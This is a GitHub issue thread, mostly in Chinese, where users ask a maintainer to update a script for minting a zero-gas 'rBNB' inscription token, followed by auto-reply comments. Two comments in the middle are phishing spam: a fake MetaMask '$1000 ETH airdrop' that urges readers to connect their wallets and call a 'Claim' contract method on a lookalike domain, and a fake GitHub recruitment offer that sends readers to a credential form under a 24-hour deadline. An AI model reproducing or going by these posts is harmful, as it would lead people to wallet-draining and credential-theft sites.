### ISSUE TITLE
rBNB

### ISSUE THREAD

**Issue by flyftfy** [lwsh123k/mine_rARB#1]
现在出来了一个0 GAS的rBNB, 看代码有办法优化一下吗。https://bnb.reth.cc/

**Comment by lwsh123k** [comment]
这个是打reth的代码改的，用这个打rarb可行吗，他的量太大了，我没有尝试

**Comment by lwsh123k** [comment]
0gas就是给他的网站发请求，用axios就行。。。但我看量还是非常的大···

**Comment by flyftfy** [comment]
rarb打完了，现在是打rbnb

lwsh123k ***@***.***>于2024年1月13日 周六11:49写道：

**Comment by flyftfy** [comment]
axios怎么弄，可以更新一下代码吗，谢谢啦🙏

lwsh123k ***@***.***>于2024年1月13日 周六11:50写道：

**Comment by lwsh123k** [comment]
网站崩了，都打不了

**Comment by flyftfy** [comment]
> 网站崩了，都打不了

现在好了，可以网页mint，啥时候更新下脚本啊，大佬。

**Comment by lwsh123k** [comment]
现在应该可以了

**Comment by flyftfy** [comment]
> 现在应该可以了

好的，大佬。笔芯。

**Comment by jinxiaoweb3** [comment]
> 现在应该可以了

哪个用来打rbnb？是那个rarb嘛？

**Comment by clqs803** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @doterlin, @StandonJoyner, @Steuart, @n1k0ver3E, @jgiamo, @WangMaoyuan, @benson-singapore

**Comment by JK407** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Ganweizhi, @xuohei, @fengss, @liwenxian, @Jarvis5780, @munegg, @krazychen, @chrisluo5311, @yilingaifei, @WangShaoming429, @maoooookx, @guojiaxin, @SinCatGit, @dai-zz-flora, @rgdzh1, @SelectedOnly, @xiaohaitunyyy, @sir-bravo, @kejunlu, @bybywudi2

**Comment by guojiaxin** [comment]
您好！邮件已收到。           ——小郭

**Comment by jinxiaoweb3** [comment]
> 您好！邮件已收到。           ——小郭

什么意思？

**Comment by guojiaxin** [comment]
您好！邮件已收到。           ——小郭

**Comment by guojiaxin** [comment]
您好！邮件已收到。           ——小郭
